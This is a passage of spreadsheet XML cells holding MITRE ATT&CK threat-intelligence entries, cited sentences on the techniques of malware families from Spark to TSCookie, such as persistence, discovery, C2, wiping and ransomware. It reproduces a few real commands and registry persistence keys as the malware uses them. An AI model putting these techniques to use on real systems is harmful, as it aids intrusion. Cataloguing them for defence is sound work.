    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has run the whoami command and has a built-in command to identify the user logged in.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has used a splash screen to check whether an user actively clicks on the screen before running malicious code.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has used HTTP POST requests to communicate with its C2 server to receive commands.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) can use cmd.exe to run commands.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses Perl scripts.(Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses cron tasks to ensure persistence. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) attempts to exploit the following vulnerabilities in order to execute its malicious script: CVE-2012-0874, CVE-2010-1871, CVE-2017-10271, CVE-2018-2894, CVE-2016-3088, JBoss AS 3/4/5/6, and the Hadoop YARN ResourceManager. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) deletes files to remove evidence on the machine. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) downloads and executes additional files from a remote server. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) checks for availability of specific ports on servers.(Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) encodes its second-stage payload with Base64. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) can perform brute forcing using a pre-defined list of usernames and passwords in an attempt to log in to administrative panels. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses Python scripts.(Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) encodes C&amp;C communication using Base64. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses the &lt;code&gt;cat /proc/cpuinfo | grep -c “cpu family” 2&gt;&amp;1&lt;/code&gt; command to gather system information. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses the &lt;code&gt;ifconfig -a&lt;/code&gt; command. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses the &lt;code&gt;arp -a&lt;/code&gt; command. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses the &lt;code&gt;whoami&lt;/code&gt; command. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses POST and GET requests over HTTP to communicate with its main C&amp;C server. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) contains a feature to manipulate process privileges and tokens.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) identifies and kills anti-malware processes.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) has a hard-coded primary and backup C2 string.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) creates a new thread implementing a keylogging facility using Windows Keyboard Accelerators.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>To establish persistence, [SslMM](https://attack.mitre.org/software/S0058) identifies the Start Menu Startup directory and drops a link to its own executable disguised as an “Office Start,” “Yahoo Talk,” “MSN Gaming Z0ne,” or “MSN Talk” shortcut.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) sends information to its hard-coded C2, including OS version, service pack information, processor speed, system name, and OS install date.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) sends the logged-on username to its hard-coded C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Starloader](https://attack.mitre.org/software/S0188) decrypts and executes shellcode from a file called Stars.jps.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>[Starloader](https://attack.mitre.org/software/S0188) has masqueraded as legitimate software update packages such as Adobe Acrobat Reader and Intel.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has a disk wiper module that targets files other than those in the Windows directory.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) can wipe the accessible physical or logical drives of the infected machine.(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) can wipe the master boot record of an infected computer.(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has been observed deleting the temporary files once they fulfill their task.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has downloaded and dropped temporary files containing scripts; it additionally has a function to upload files from the victims machine.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has obfuscated its module with an alphabet-based table or XOR encryption.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has relied on injecting its payload directly into the process memory of the victim's preferred browser.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has looked in the registry to find the default browser path.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) can take screenshots.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) can check for antivirus and antimalware programs.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has the capability to discover the system OS, Windows version, architecture and environment.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) can obtain the current date and time of the victim machine.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has used several anti-emulation techniques to prevent automated analysis by emulators or sandboxes.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has several VBS scripts used throughout the malware's lifecycle.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has used the WMI command-line (WMIC) utility to run tasks.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to enumerate drive types.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to modify the Registry.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) obfuscates some commands by using statically programmed fragments of strings when starting a DLL. It also uses a one-byte xor against 0x91 to encode configuration data.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to enumerate processes.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) uses rundll32 to call an exported function.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to scan for security tools such as firewalls and antivirus tools.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to enumerate system information.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to remotely execute commands.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) establishes persistence by installing a new service pointing to its DLL and setting the service to auto-start.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can compress and encrypt archived files into multiple .sft files with a repeated xor encryption scheme.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has encrypted C2 traffic using SSL/TLS.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has a file searcher component that can automatically collect and archive files based on a predefined list of file extensions.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can automatically exfiltrate collected documents to the C2 server.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has been signed with self-signed certificates.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can add directories used by the malware to the Windows Defender exclusions list to prevent detection.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can exfiltrate collected documents through C2 channels.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can delete previously exfiltrated files from the compromised host.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can parse the hard drive on a compromised host to identify specific file extensions.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has the ability to hide the console window for its document search module from the user.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can download files to specified targets.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has been executed via compromised installation files for legitimate software including compression applications, security software, browsers, file recovery applications, and other tools and utilities.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has named services to appear legitimate.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has been bundled with legitimate software installation files for disguise.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can use multiple layers of proxy servers to hide terminal nodes in its infrastructure.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">
[StrongPity](https://attack.mitre.org/software/S0491) has used HTTPS over port 1402 in C2 communication.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has used encrypted strings in its dropper component.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can use PowerShell to add files to the Windows Defender exclusions list.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can determine if a user is logged in by checking to see if explorer.exe is running.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can use the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key for persistence.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can identify if ESET or BitDefender antivirus are installed before dropping its payload.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can install a service to execute itself as a service.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can identify the hard disk volume serial number on a compromised host.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can identify the IP address of a compromised host.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can use HTTP and HTTPS in C2 communications.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has created new services and modified existing services for persistence.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) uses SSL for encrypting C2 communications.(Citation: Blasco 2013)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;net group "domain admins" /domain&lt;/code&gt; to display accounts in the "domain admins" permissions group and &lt;code&gt;net localgroup "administrators"&lt;/code&gt; to list local system administrator group membership.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) injects itself into running instances of outlook.exe, iexplore.exe, or firefox.exe.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) contains keylogging functionality to steal passwords.(Citation: Alienvault Sykipot DOD Smart Cards)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may gather a list of running processes by running &lt;code&gt;tasklist /v&lt;/code&gt;.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) has been known to establish persistence by adding programs to the Run Registry key.(Citation: Blasco 2013)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;net view /domain&lt;/code&gt; to display hostnames of available systems on a network.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;ipconfig /all&lt;/code&gt; to gather system network configuration details.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;netstat -ano&lt;/code&gt; to display active network connections.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;net start&lt;/code&gt; to display running services.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) is known to contain functionality that enables targeting of smart card technologies to proxy authentication for connections to restricted network resources using detected hardware tokens.(Citation: Alienvault Sykipot DOD Smart Cards)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) clears event logs.(Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) encrypts the victims machine followed by asking the victim to pay a ransom. (Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) checks its directory location in an attempt to avoid launching in a sandbox.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) can manipulate Registry keys.(Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) parses the export tables of system DLLs to locate and call various Windows API functions.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) payloads are obfuscated prior to compilation to inhibit analysis and/or reverse engineering.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) enumerates all running processes.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) abuses NTFS transactions to launch and conceal malicious processes.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) enumerates Registry keys associated with event logs.(Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) gathers computer names, OS version info, and also checks installed keyboard layouts to estimate if it has been launched from a certain list of countries.(Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) gathers user names from infected hosts.(Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) enumerates all running services.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) collects the group name of the logged-in user and sends it to the C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) uses an XOR 0x1 loop to encrypt its C2 domain.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) collects the computer name, OS versioning information, and OS install date and sends the information to the C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) collects the local IP address of the victim and sends it to the C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) collects the account name of the logged-in user and sends it to the C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) uses HTTP for C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather information about the operating system.(Citation: TechNet Systeminfo)</t>
  </si>
  <si>
    <t>If a victim meets certain criteria, [T9000](https://attack.mitre.org/software/S0098) uses the AppInit_DLL functionality to achieve persistence by ensuring that every user mode process that is spawned will load its malicious DLL, ResN32.dll. It does this by creating the following Registry keys: &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs – %APPDATA%\Intel\ResN32.dll&lt;/code&gt; and &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs – 0x1&lt;/code&gt;.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) encrypts collected data using a single byte XOR key.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) uses the Skype API to record audio and video calls. It writes encrypted data to &lt;code&gt;%APPDATA%\Intel\Skype&lt;/code&gt;.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) searches removable storage devices for files with a pre-defined list of file extensions (e.g. * .doc, *.ppt, *.xls, *.docx, *.pptx, *.xlsx). Any matching files are encrypted and written to a local user directory.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>During the [T9000](https://attack.mitre.org/software/S0098) installation process, it drops a copy of the legitimate Microsoft binary igfxtray.exe. The executable contains a side-loading weakness which is used to load a portion of the malware.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) searches through connected drives for removable storage devices.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) can take screenshots of the desktop and target application windows, saving them to user directories as one byte XOR encrypted .dat files.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) performs checks for various antivirus and security products during installation.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) gathers and beacons the operating system build number and CPU Architecture (32-bit/64-bit) during installation.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) gathers and beacons the MAC and IP addresses during installation.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) gathers and beacons the username of the logged in account during installation. It will also gather the username of running processes to determine if it is running as SYSTEM.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) gathers and beacons the system time during installation.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) has used &lt;code&gt;FileReadZipSend&lt;/code&gt; to compress a file and send to C2.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can execute &lt;code&gt;FileRecvWriteRand&lt;/code&gt; to append random bytes to the end of a file received from C2.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can randomly pick one of five hard-coded IP addresses for C2 communication; if one of the IP fails, it will wait 60 seconds and then try another IP address.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can delete files from a compromised host.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can use &lt;code&gt;DirectoryList&lt;/code&gt; to enumerate files in a specified directory.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can download additional modules from its C2 server.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>The [TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) main executable has disguised itself as Microsoft’s Narrator.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can execute &lt;code&gt;ProcessList&lt;/code&gt; for process discovery.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) has used FakeTLS for session authentication.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can copy itself into the current user’s Startup folder as “Narrator.exe” for persistence.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>The [TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) command and execution module can perform target system enumeration.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) uses a Linear Feedback Shift Register (LFSR) algorithm for network encryption.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can use &lt;code&gt;DriveList&lt;/code&gt; to retrieve drive information.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can execute &lt;code&gt;GetLocalTime&lt;/code&gt; for time discovery.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can change the timestamp of specified filenames.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can enable Windows CLI access and execute files.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TDTESS](https://attack.mitre.org/software/S0164) creates then deletes log files during installation of itself as a service.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>[TDTESS](https://attack.mitre.org/software/S0164) has a command to download and execute an additional file.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>After creating a new service for persistence, [TDTESS](https://attack.mitre.org/software/S0164) sets the file creation time for the service to the creation time of the victim's legitimate svchost.exe file.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>[TDTESS](https://attack.mitre.org/software/S0164) provides a reverse shell on the victim.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>If running as administrator, [TDTESS](https://attack.mitre.org/software/S0164) installs itself as a new service named bmwappushservice to establish persistence.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>[TEARDROP](https://attack.mitre.org/software/S0560) was decoded using a custom rolling XOR algorithm to execute a customized [Cobalt Strike](https://attack.mitre.org/software/S0154) payload.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Check Point Sunburst Teardrop December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[TEARDROP](https://attack.mitre.org/software/S0560) files had names that resembled legitimate Window file and directory names.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[TEARDROP](https://attack.mitre.org/software/S0560) modified the Registry to create a Windows service for itself on a compromised host.(Citation: Check Point Sunburst Teardrop December 2020)</t>
  </si>
  <si>
    <t>[TEARDROP](https://attack.mitre.org/software/S0560) created and read from a file with a fake JPG header, and its payload was encrypted with a simple rotating XOR cipher.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Check Point Sunburst Teardrop December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[TEARDROP](https://attack.mitre.org/software/S0560) checked that &lt;code&gt;HKU\SOFTWARE\Microsoft\CTF&lt;/code&gt; existed before decoding its embedded payload.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021) </t>
  </si>
  <si>
    <t>[TEARDROP](https://attack.mitre.org/software/S0560) ran as a Windows service from the &lt;code&gt;c:\windows\syswow64&lt;/code&gt; folder.(Citation: Check Point Sunburst Teardrop December 2020)(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[TEXTMATE](https://attack.mitre.org/software/S0146) uses DNS TXT records for C2.(Citation: FireEye FIN7 March 2017)</t>
  </si>
  <si>
    <t>[TEXTMATE](https://attack.mitre.org/software/S0146) executes cmd.exe to provide a reverse shell to adversaries.(Citation: FireEye FIN7 March 2017)(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>When a document is found matching one of the extensions in the configuration, [TINYTYPHON](https://attack.mitre.org/software/S0131) uploads it to the C2 server.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[TINYTYPHON](https://attack.mitre.org/software/S0131) searches through the drive containing the OS, then all drive letters C through to Z, for documents matching certain extensions.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[TINYTYPHON](https://attack.mitre.org/software/S0131) has used XOR with 0x90 to obfuscate its configuration file.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[TINYTYPHON](https://attack.mitre.org/software/S0131) installs itself under Registry Run key to establish persistence.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to steal saved passwords from the Internet Explorer, Edge, Firefox, and Chrome browsers.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
